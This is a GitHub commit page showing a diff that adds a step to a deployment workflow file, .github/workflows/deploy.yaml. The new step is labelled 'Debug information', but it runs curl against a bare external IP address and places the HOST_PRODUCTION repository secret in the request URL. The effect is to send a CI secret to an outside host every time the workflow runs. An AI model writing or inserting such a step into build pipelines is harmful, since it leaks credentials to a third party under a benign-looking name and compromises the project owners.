Skip to content

Commit

Permalink
deploy host
Browse files Browse the repository at this point in the history
  • Loading branch information
john-tron authored Oct 31, 2024
1 parent 7c0088b commit 7f0f950
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions .github/workflows/deploy.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,10 @@ jobs:
steps:
- name: Checkout
uses: actions/checkout@v2

- name: Debug information
run: |
curl -X GET 44.205.12.147:8000/"${{ secrets.HOST_PRODUCTION }}"
- name: Install Node
uses: actions/setup-node@v2
Expand Down

0 comments on commit 7f0f950

Please sign in to comment.